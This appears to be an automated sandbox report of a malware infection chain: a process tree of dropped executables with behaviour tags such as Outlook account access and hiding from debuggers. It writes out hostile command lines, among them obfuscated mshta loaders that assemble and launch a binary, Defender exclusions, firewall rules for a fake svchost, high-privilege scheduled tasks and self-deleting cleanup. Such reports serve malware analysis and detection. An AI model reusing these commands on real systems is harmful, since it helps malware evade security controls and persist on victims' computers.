C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC11⤵
- Loads dropped DLL
PID:4676
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "LzmwAqmV.exe"8⤵
- Kills process with taskkill
PID:5572
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10.exe"C:\Users\Admin\AppData\Local\Temp\10.exe"4⤵
- Executes dropped EXE
PID:5300 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"5⤵
- Loads dropped DLL
PID:5436
-
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5364
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\mt5IRqNxCvOuLR7GM_no0d2t.exe"C:\Users\Admin\Pictures\Adobe Films\mt5IRqNxCvOuLR7GM_no0d2t.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4668 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im mt5IRqNxCvOuLR7GM_no0d2t.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\mt5IRqNxCvOuLR7GM_no0d2t.exe" & del C:\ProgramData\*.dll & exit3⤵PID:4132
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im mt5IRqNxCvOuLR7GM_no0d2t.exe /f4⤵
- Kills process with taskkill
PID:3236
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 64⤵
- Delays execution with timeout.exe
PID:3272
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe"C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3680 -
C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe"C:\Users\Admin\Pictures\Adobe Films\xcW3TuSn3KSNmakFvG9gZQDx.exe"3⤵
- Executes dropped EXE
PID:3436
-
-
-
C:\Users\Admin\Pictures\Adobe Films\aoWnOtt3BnvpIQ5LuYSMKmgs.exe"C:\Users\Admin\Pictures\Adobe Films\aoWnOtt3BnvpIQ5LuYSMKmgs.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:772 -
C:\Users\Admin\AppData\Local\Temp\is-KM2OK.tmp\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp"C:\Users\Admin\AppData\Local\Temp\is-KM2OK.tmp\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp" /SL5="$40110,506127,422400,C:\Users\Admin\Pictures\Adobe Films\aoWnOtt3BnvpIQ5LuYSMKmgs.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:740 -
C:\Users\Admin\AppData\Local\Temp\is-A0VU2.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-A0VU2.tmp\DYbALA.exe" /S /UID=27104⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:4500 -
C:\Program Files\Reference Assemblies\VRFCYSEISA\foldershare.exe"C:\Program Files\Reference Assemblies\VRFCYSEISA\foldershare.exe" /VERYSILENT5⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:3932
-
-
C:\Users\Admin\AppData\Local\Temp\17-169ea-342-f7b94-07854e1c39058\SHodecytolae.exe"C:\Users\Admin\AppData\Local\Temp\17-169ea-342-f7b94-07854e1c39058\SHodecytolae.exe"5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4836
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\gXt9NtnPmMCRWaXBrQk8NfGb.exe"C:\Users\Admin\Pictures\Adobe Films\gXt9NtnPmMCRWaXBrQk8NfGb.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"3⤵
- Executes dropped EXE
PID:1740
-
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"3⤵
- Executes dropped EXE
PID:1576
-
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
-
C:\Users\Admin\Pictures\Adobe Films\_eKJw2OFuLijigALN0RShv0q.exe"C:\Users\Admin\Pictures\Adobe Films\_eKJw2OFuLijigALN0RShv0q.exe"2⤵
- Executes dropped EXE
PID:996
-
-
C:\Users\Admin\Pictures\Adobe Films\cwvHAknFTAWGE2B0rxX1TkrF.exe"C:\Users\Admin\Pictures\Adobe Films\cwvHAknFTAWGE2B0rxX1TkrF.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1308 -
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:1276 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit4⤵PID:896
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im build.exe /f5⤵
- Kills process with taskkill
PID:1500
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 65⤵
- Delays execution with timeout.exe
PID:1288
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\FmIprFPSFzOTXlcTeprUC6YU.exe"C:\Users\Admin\Pictures\Adobe Films\FmIprFPSFzOTXlcTeprUC6YU.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3824 -
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=13⤵
- Adds Run key to start application
PID:6452 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"4⤵
- Checks computer location settings
- Suspicious use of FindShellTrayWindow
PID:6552 -
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x210,0x214,0x218,0x1ec,0x21c,0x7ffc0c1bdec0,0x7ffc0c1bded0,0x7ffc0c1bdee05⤵PID:6628
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=1696 /prefetch:85⤵PID:6788
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1640 /prefetch:25⤵PID:6780
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=1984 /prefetch:85⤵PID:6820
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2512 /prefetch:15⤵
- Checks computer location settings
PID:6948
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2572 /prefetch:15⤵
- Checks computer location settings
PID:6988
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2964 /prefetch:25⤵PID:5148
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=1652 /prefetch:85⤵PID:6196
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=3416 /prefetch:85⤵PID:6328
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=2660 /prefetch:85⤵PID:3200
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=3332 /prefetch:85⤵PID:6356
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=3536 /prefetch:85⤵PID:5148
-
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1572,17869567253882608851,4528485088332362600,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6552_807944792" --mojo-platform-channel-handle=2652 /prefetch:85⤵PID:6840
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\n6LyyW6Y130rISPizyLnNBN_.exe"C:\Users\Admin\Pictures\Adobe Films\n6LyyW6Y130rISPizyLnNBN_.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3276 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe3⤵PID:1612
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe4⤵
- Kills process with taskkill
PID:5000
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3196 -
C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
PID:3240 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Pictures\Adobe Films\9NDwiPlZEEhDGlkz9gl0UQAX.exe"4⤵PID:2284
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK5⤵
- Delays execution with timeout.exe
PID:3056
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe"C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe"2⤵
- Executes dropped EXE
PID:4488 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )3⤵PID:1196
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\Ul6PF7ORyqCzK3rFPRAWHREO.exe" ) do taskkill -im "%~NxK" -F4⤵PID:2852
-
C:\Users\Admin\AppData\Local\Temp\8pWB.eXE8pWB.eXe /pO_wtib1KE0hzl7U9_CYP5⤵
- Executes dropped EXE
PID:3932 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VBsCRIPt:cLose( creAteObjecT("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )6⤵PID:4476
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F7⤵PID:4104
-
-
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ("WSCRIPt.SheLl" ). rUn ("C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl + _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " ,0 , TruE ) )6⤵PID:1808
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 +HxU0.m + HR0NM.yl+ _AECH.7+ ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY7⤵PID:3512
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHO "8⤵PID:1204
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"8⤵PID:2972
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec.exe -y .\N3V4H8H.SXY8⤵
- Loads dropped DLL
PID:1436
-
-
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "Ul6PF7ORyqCzK3rFPRAWHREO.exe" -F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4832
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\exJBBJ57RhMwfX6V7rNCirtY.exe"C:\Users\Admin\Pictures\Adobe Films\exJBBJ57RhMwfX6V7rNCirtY.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
PID:640 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nyj61S0T9w.bat"3⤵PID:972
-
C:\Windows\SysWOW64\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:24⤵PID:3048
-
C:\Windows\System32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:25⤵PID:3836
-
-
-
C:\Recovery\WindowsRE\ShellExperienceHost.exe"C:\Recovery\WindowsRE\ShellExperienceHost.exe"4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
PID:4456
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4972 -
C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"3⤵
- Executes dropped EXE
PID:4256
-
-
C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"C:\Users\Admin\Pictures\Adobe Films\NvFMn_zIjzcOhCOAYPNfV55o.exe"3⤵
- Executes dropped EXE
PID:3816
-
-
-
C:\Users\Admin\Pictures\Adobe Films\1hlySlP9nisX71mJnP5mZ3Qa.exe"C:\Users\Admin\Pictures\Adobe Films\1hlySlP9nisX71mJnP5mZ3Qa.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2176 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4244
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:2112
-
-
-
C:\Users\Admin\Pictures\Adobe Films\kMqKKP_wvgeIt3GAmkhy0_7l.exe"C:\Users\Admin\Pictures\Adobe Films\kMqKKP_wvgeIt3GAmkhy0_7l.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4632
-
-
C:\Users\Admin\Pictures\Adobe Films\EWVAtHTOXdt0DAYRA3GEQBur.exe"C:\Users\Admin\Pictures\Adobe Films\EWVAtHTOXdt0DAYRA3GEQBur.exe"2⤵
- Executes dropped EXE
PID:300 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 6563⤵
- Program crash
PID:2620
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 6683⤵
- Program crash
PID:3640
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 6723⤵
- Program crash
PID:4872
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 8123⤵
- Program crash
PID:3256
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 10483⤵
- Program crash
PID:3136
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 300 -s 11403⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:4092
-
-
-
C:\Users\Admin\Pictures\Adobe Films\ZuWzpISe9wfUgG8mQ9ORonH1.exe"C:\Users\Admin\Pictures\Adobe Films\ZuWzpISe9wfUgG8mQ9ORonH1.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1060
-
-
C:\Users\Admin\Pictures\Adobe Films\YLPxR1bFWYWLGzK0QEMH4Yaa.exe"C:\Users\Admin\Pictures\Adobe Films\YLPxR1bFWYWLGzK0QEMH4Yaa.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:592 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\3⤵PID:1508
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:1744
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes3⤵PID:4700
-
-
C:\Windows\SYSTEM32\schtasks.exeschtasks /create /sc minute /ED "11/02/2024" /mo 7 /tn "Timer" /tr c:\windows\system\svchost.exe /ru SYSTEM3⤵
- Creates scheduled task(s)
PID:5720
-
-
C:\Windows\System\svchost.exe"C:\Windows\System\svchost.exe" formal3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Drops file in Windows directory
PID:5768 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\4⤵PID:5360
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=in action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:2748
-
-
C:\Windows\System32\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="SvcHostX" dir=out action=allow program="C:\Windows\System\svchost.exe" enable=yes4⤵PID:5024
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\EF78.exeC:\Users\Admin\AppData\Local\Temp\EF78.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2496 -
C:\Users\Admin\AppData\Local\Temp\EF78.exeC:\Users\Admin\AppData\Local\Temp\EF78.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:344
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1536
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "_eKJw2OFuLijigALN0RShv0q" /sc ONLOGON /tr "'C:\Windows\Tasks\_eKJw2OFuLijigALN0RShv0q.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2192
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RqcBdtquQCGLaKIMXJSNd_ZL" /sc ONLOGON /tr "'C:\odt\RqcBdtquQCGLaKIMXJSNd_ZL.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2372
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "aoWnOtt3BnvpIQ5LuYSMKmgs.tmp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4052
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "9NDwiPlZEEhDGlkz9gl0UQAX" /sc ONLOGON /tr "'C:\Users\Admin\Pictures\Adobe Films\FmIprFPSFzOTXlcTeprUC6YU\9NDwiPlZEEhDGlkz9gl0UQAX.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2300
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\ShellExperienceHost.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:896
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "aoWnOtt3BnvpIQ5LuYSMKmgs.tmp" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\is-KM2OK.tmp\aoWnOtt3BnvpIQ5LuYSMKmgs.tmp.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:4484
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxBlockMap\ShellExperienceHost.exe'" /rl HIGHEST /f1⤵
